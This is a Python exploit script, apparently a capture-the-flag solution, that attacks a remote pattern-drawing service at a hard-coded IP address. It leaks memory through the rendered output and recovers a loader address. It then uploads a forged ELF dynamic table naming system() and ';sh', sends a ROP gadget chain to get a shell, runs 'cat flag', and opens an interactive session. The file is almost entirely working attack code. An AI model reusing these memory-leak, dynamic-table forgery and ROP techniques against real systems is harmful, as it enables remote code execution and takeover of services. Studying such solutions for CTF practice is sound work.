@Idolf /doit.py Secret
Created Mar 23, 2015
from pwn import *
# Module-level `pattern` is not referenced anywhere below: do_upload_pattern
# takes a parameter of the same name, which shadows it.
pattern = 'ABCD'
# Connection to the service.  The two commented-out lines are the local
# alternatives (a wrapper process, a LAN host) left over from development.
# r = process('./wrapper.sh')
# r = remote('192.168.1.104', 6665)
r = remote('146.148.60.107', 6665)
# Hard-coded libc load address for the target.  The commented-out block
# below would instead read it out of /proc/<pid>/maps of a local process
# and compare the two values.
libc_base = 0xf75b4000
# libc_base_alt = int(read('/proc/%d/maps' % pidof(r)[0]).split('\n')[4].split('-')[0], 16)
# libc_base = libc_base_alt
# print hex(libc_base_alt)
# print hex(libc_base ^ libc_base_alt)
# if libc_base == libc_base_alt:
# splash()
# Two fixed offsets added to libc_base.  The names suggest system() and a
# ROP gadget, but this file does not show which libc build they belong to.
do_system = libc_base + 0x3A880
gadget = libc_base + 0x0016cb25
# print hex(libc_base)
def do_upload_pattern(pattern, author='A'):
    """Walk the service menu to upload one square pattern.

    ``pattern`` is the raw pattern body.  Its length must be a perfect
    square whose side is between 2 and 24; the service is told twice the
    side as the pattern size.  ``author`` is the designer name and may be
    at most 0x3f characters.  The assertions check those ranges before
    anything is sent to the remote side.
    """
    side = int(len(pattern) ** 0.5)
    assert side ** 2 == len(pattern)
    assert 2 <= side <= 24
    assert 0 <= len(author) <= 0x3f
    # (prompt, answer, terminate-with-newline) in the order the menu asks.
    dialogue = [
        ('> ', '2', True),
        ('Pattern size? ', str(side * 2), True),
        ("Pattern designer's name? ", author, True),
        ('Pattern raw data? \n', pattern, False),
        ('> ', '3', True),
    ]
    for prompt, answer, with_newline in dialogue:
        if with_newline:
            r.sendlineafter(prompt, answer)
        else:
            r.sendafter(prompt, answer)
def do_beautify():
    """Pick menu entry 3 at the next ``> `` prompt."""
    entry = '3'
    r.sendlineafter('> ', entry)
def do_exit():
    """Pick menu entry 5 at the next ``> `` prompt."""
    entry = '5'
    r.sendlineafter('> ', entry)
def vertical(n):
    """Swap the two 2-bit halves of every nibble in the 32-bit value ``n``.

    Bits 0-1 trade places with bits 2-3, bits 4-5 with bits 6-7, and so
    on across all 32 bits.  Bits above 31 are dropped by the masks.
    """
    low_pairs = 0x33333333   # bits 0-1 of every nibble
    high_pairs = 0xcccccccc  # bits 2-3 of every nibble
    moved_up = (n & low_pairs) << 2
    moved_down = (n & high_pairs) >> 2
    return moved_up | moved_down
def horizontal(n):
    """Swap the two nibbles of every byte in the 32-bit value ``n``.

    The low nibble of each byte moves up four bits and the high nibble
    moves down four bits.  Bits above 31 are dropped by the masks.
    """
    low_nibbles = 0x0f0f0f0f
    high_nibbles = 0xf0f0f0f0
    lifted = (n & low_nibbles) << 4
    dropped = (n & high_nibbles) >> 4
    return lifted | dropped
SIZE = 60
# Body of the first upload: a cyclic filler, then two 32-bit words run
# through horizontal() before they are sent (why the nibble swap is needed
# is not visible in this file -- presumably the service transforms the
# data on the way in; confirm against the binary).  Padded with spaces to
# a 13x13 square, so do_upload_pattern reports a size of 26.
data = cyclic(43) + p32(horizontal(SIZE*2)) + p32(horizontal(1))
do_upload_pattern(data.ljust(13*13))
do_beautify()
# After this banner the service prints the rendered pattern; SIZE*2 text
# rows are collected for decoding below.
r.recvuntil('SYSTEM.\n')
lines = [r.recvline().rstrip('\n') for _ in range(SIZE*2)]
# Decode the rendered rows back into bytes.  (Python 2: `out` is a byte
# string, which is why chr() and u32() are used on it directly.)
out = ''
# Each drawn glyph stands for a 2-bit value, so four glyphs rebuild one
# byte.
bd = {
    '|': 0,
    '-': 1,
    '*': 2,
    ' ': 3
}
for row in range(SIZE):
    for col in range(SIZE):
        # One cell spans two text rows and two glyph columns; glyphs sit
        # four characters apart.  Read top-left, top-right, bottom-left,
        # bottom-right.
        c0 = lines[row * 2][4*col]
        c1 = lines[row * 2][4*col+2]
        c2 = lines[row * 2+1][4*col]
        c3 = lines[row * 2+1][4*col+2]
        # Reassemble the byte, least-significant pair first.
        b = bd[c0] | (bd[c1] << 2) | (bd[c2] << 4) | (bd[c3] << 6)
        out += chr(b)
# Read one 32-bit value at offset 0x2cc of the recovered bytes and subtract
# a fixed offset.  The names say this is the dynamic loader's base; the
# 0x228e4 constant is specific to the target build.  Note that ld_base is
# not referenced again anywhere in this script.
ld_ptr = u32(out[0x2cc:0x2d0])
ld_base = ld_ptr - 0x228e4
# Table of 32-bit words -- ints, or 4-character strings that flat() turns
# into bytes later -- consumed in pairs by the packing loop below.  Each
# "# Group n" label heads 12 words, which the loop splits into two runs of
# six.  NOTE(review): the first column (0x1, 0x5, 0x6, 0x6ffffef5, ...)
# resembles ELF .dynamic (tag, value) pairs, as the variable name also
# suggests; that cannot be verified from this file alone.
dynamic = [
    # Group 0
    0xdeadbeef, 0xdeadbeef,
    0xdeadbeef, 0xdeadbeef,
    0xdeadbeef, 0xdeadbeef,
    0x1 , 0x10,
    0xc , 0x804846c,
    0xd , 0x8048efc,
    # Group 1
    0x6ffffef5, 0x80481cc,
    # 0x5 , 0x80482f8 + 52,
    0x5 , 0x804b3e4 - (0x321 - 0x2f8) - 3,
    0x6 , 0x80481f8,
    0xa , 0xac,
    0xb , 0x10,
    0x15 , 0xf77128e4,
    # Group 2
    0x3 , 0x804aff4,
    0x2 , 0x60,
    0x14 , 0x11,
    0x17 , 0x804840c,
    0x11 , 0x80483f4,
    0x12 , 0x18,
    # Group 3
    0x13 , 0x8,
    0x6ffffffe, 0x80483c4,
    0x6fffffff, 0x1,
    0x6ffffff0, 0x80483a4,
    0x0 , 0x0,
    0x0 , 0x0,
    # Group 4,
    0 , 0,
    0 , 0,
    0 , 0,
    do_system , ';sh\0',
    0 , '\0rea',
    'd\0\0\0' , '\0\0\0\0',
    # Group 5
    0 , 0,
    0 , 0,
    0 , 0
    # Trailing string, split into 4-character chunks and NUL-padded (so the
    # list ends with two more string words, if group() behaves as usual).
] + group(4, 'wcsdup\0', 'fill', '\0')
# One selector tuple per pair of 6-word runs: for position n, 0 takes the
# first run's word unchanged, 1 takes the second run's word transformed.
choose = [
    (1, 1, 1, 1, 1, 1),
    (0, 0, 0, 0, 0, 0),
    (0, 0, 1, 1, 1, 1),
    (0, 0, 0, 0, 1, 1),
    (1, 1, 1, 1, 1, 1),
    (1, 1, 1, 1, 1, 1),
]
# Split `dynamic` into runs of six (zero-padded), then pair the runs up.
z = zip(choose, group(2, group(6, dynamic, 'fill', 0)))
# `dynamic` is rebound here from the word list to its serialized bytes.
dynamic = ''
for choice, (a, b) in z:
    # The second run is read back to front, and each selected word from it
    # is 2-bit-swapped (vertical()) and emitted byte-reversed.  The reason
    # for that mirroring is not visible in this file.
    b = tuple(reversed(b))
    for n in range(6):
        if choice[n]:
            dynamic += p32(vertical(u32(flat(b[n]))))[::-1]
        else:
            dynamic += flat(a[n])
# Second upload: 312 filler bytes followed by the packed table, padded with
# spaces to the largest square do_upload_pattern accepts (24x24).
data = 312 * 'A' + dynamic
data = data.ljust(24*24)
do_upload_pattern(data)
do_beautify()
do_exit()
# Once the farewell banner has arrived, send one more line: a fixed
# address, twelve copies of `gadget`, and cyclic filler.  What the service
# does with input after exiting is not visible here.
r.recvuntil('Have a nice day! Bye bye!\n')
r.sendline(p32(0x804f7d4) + p32(gadget) * 12 + cyclic(1600))
sleep(0.1)
# Best effort from here on: a dropped connection (EOFError) just ends the
# script.  Note that the assert raises AssertionError, which this handler
# does not catch; recvline() with a timeout returns '' on expiry, which
# would trip it.
try:
    r.recv()
    # Liveness probe: expect the marker echoed back within one second.
    r.sendline('echo MARKER')
    assert 'MARKER' in r.recvline(timeout = 1.0)
    r.sendline('cat flag')
    # Hand the session over to the user.
    r.interactive()
except EOFError:
    pass